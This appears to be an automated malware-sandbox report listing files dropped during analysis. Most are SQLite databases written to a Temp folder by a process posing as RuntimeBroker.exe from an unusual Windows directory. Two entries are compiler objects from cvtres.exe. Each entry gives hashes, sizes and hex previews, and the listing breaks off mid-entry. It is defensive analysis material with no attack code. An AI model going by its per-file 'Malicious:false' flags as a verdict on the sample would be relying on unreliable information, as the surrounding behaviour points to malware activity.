                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\OlgNRJm9Kj

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\OvRN5nW0jy

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\OyOktdzJ3e

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\PCNJ91y7Eh

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\PG9YsDVKpA

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\PmwHBwtTFe

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\PqngadWsia

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\PtuLBdrtP1

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Q2sTLvjWwC

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Q8NZVJRSwI

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\QAlNaxzMRv

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\QRP3Ek5b4G

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\RBiiEyiQCR

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\RESBF2D.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Sat Jan 11 07:16:07 2025, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1932
                                                                                  Entropy (8bit):4.613005317386376
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:HjfW9JLzcXQBtbaHIQwKDMHNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+5gcN:TaLzZCIKDMHslmuulB+hnqXSfbNtmh5N
                                                                                  MD5:403E0ABBA551517D0F4CB6BC10DE9038
                                                                                  SHA1:ED4A756D4635509576AC8B47A381B5C82C1457FB
                                                                                  SHA-256:7EF3F899ED94C40CE3977E02F459BDEEC276670D9552A1F1A9C4EB4FB6609CC8
                                                                                  SHA-512:11E72D261B6FD1189D5B36D8C27AA4B0855842E9AF2C5CD81C0AFD6E116E89E8DC29B7C5053C0B2DF4AAD137D5DEED5B080748368DC71A2FB9A59DEB3C0B5857
                                                                                  Malicious:false
                                                                                  Preview:L......g.............debug$S........\...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E4D641D33A148FC98C6B9EA6A6669B1.TMP....................q.QK.......N..........7.......C:\Users\user\AppData\Local\Temp\RESBF2D.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\ServerWinRuntimeBroker.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.

                                                                                  C:\Users\user\AppData\Local\Temp\RESC121.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Sat Jan 11 07:16:07 2025, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1956
                                                                                  Entropy (8bit):4.560599855665032
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:H7O9GXOXjtbaHgwKDMHNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:0XQvKDMHEluOulajfqXSfbNtmh1Z
                                                                                  MD5:93F51BB1B47E66279DD4D910D78CD19A
                                                                                  SHA1:697D047F6C0F6A3FBCDAEF718CDFE81ADD0347F6
                                                                                  SHA-256:CF218BD2BFD1CD18B68C3B74C9244ED7734067DF02A8AB5B67380D991B76FBF3
                                                                                  SHA-512:05FCCF670047117CE13D4A51A7A232593B84CF0662BF28521A805AC28B105D36FB9568C44F4AD314AE46104075B9DDD8F5974FDA2AA995FE3975A420B90EFE49
                                                                                  Malicious:false
                                                                                  Preview:L......g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........<....c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP..................r.av..t.y..............7.......C:\Users\user\AppData\Local\Temp\RESC121.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\ServerWinRuntimeBroker.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                                                                  C:\Users\user\AppData\Local\Temp\ROoiZtUjZt

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Rlvq4UqmMu

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\SYXCZQInFG

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\SdOOWi3B5L

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\SvVux5DUJ8

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\TGidGFSPeb

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\TJXF0gu2Uu

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
